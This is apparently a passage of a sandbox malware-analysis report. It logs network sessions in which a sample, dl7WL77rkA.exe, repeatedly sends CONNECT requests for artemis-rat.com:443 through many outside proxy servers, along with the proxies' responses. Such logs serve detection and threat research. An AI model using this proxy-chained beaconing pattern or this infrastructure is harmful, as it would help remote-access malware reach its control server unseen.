                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.108063936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796526909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1464192.168.2.553537185.49.31.20780813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.580424070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1465192.168.2.55388047.243.114.19281803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.583194017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1466192.168.2.55247434.87.84.105803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.583194017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.772639036 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 532
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at pituk@mycashback.co to inform them of the time this e
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.772650003 CET172INData Raw: 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20
                                                                                                                                                                                                                                                            Data Ascii: rror occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1467192.168.2.553946133.18.234.13803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.586757898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.860979080 CET113INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65
                                                                                                                                                                                                                                                            Data Ascii: Backend not available


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1468192.168.2.55402038.54.101.25431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.587553978 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.767282963 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.692897081 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.752516985 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.893060923 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.245434999 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.693183899 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:21.100889921 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:55.916846991 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1469192.168.2.554047104.16.106.154803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.588047981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.742523909 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1470192.168.2.554053104.25.230.252803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
Mar 11, 2024 03:30:44.591784954 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.751276016 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:44 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1471192.168.2.55393645.120.178.19710803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.596846104 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1472192.168.2.554008192.210.228.28156733876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.597479105 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1473192.168.2.55250251.161.131.84258433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.642155886 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1474192.168.2.55399785.25.177.53576993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.650489092 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.389478922 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.405383110 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.405278921 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.092756987 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:55.889508963 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:59.702457905 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1475192.168.2.553907202.8.74.1080803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.650676012 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.971265078 CET | 19 | IN | HTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1476192.168.2.553925216.137.184.253803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.650746107 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.316951036 CET | 965 | IN | HTTP/1.1 500 Internal Server Error
Date: Mon, 11 Mar 2024 02:30:46 GMT
Server: Apache
Strict-Transport-Security: max-age=63072000; includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Length: 663
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at root@server.sena.cl to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1477192.168.2.55409643.134.237.2164433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.657568932 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1478192.168.2.55396865.109.211.10131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.657901049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.067836046 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1479192.168.2.553962194.247.173.1780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.660300970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1480192.168.2.55390093.90.212.241533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.664257050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1481192.168.2.554027167.172.159.43313063876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.664527893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1482192.168.2.554087104.16.109.207803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.664572954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.819835901 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1483192.168.2.553985186.124.164.213803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.664679050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1484192.168.2.553998212.31.100.13841533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.665540934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1485192.168.2.553987190.14.32.20956783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.665714979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1486192.168.2.553904109.194.22.6180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.665739059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1487192.168.2.55400558.75.126.23541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.670047998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1488192.168.2.553872102.132.50.680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.673114061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1489192.168.2.55396658.20.248.13990023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.673181057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.035546064 CET311INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1490192.168.2.552584194.4.50.132123343876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.677804947 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1491192.168.2.55411843.134.237.2164433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.681703091 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1492192.168.2.554004193.239.56.8480813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.681812048 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1493192.168.2.549884103.35.189.21710803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:44.682320118 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.796971083 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
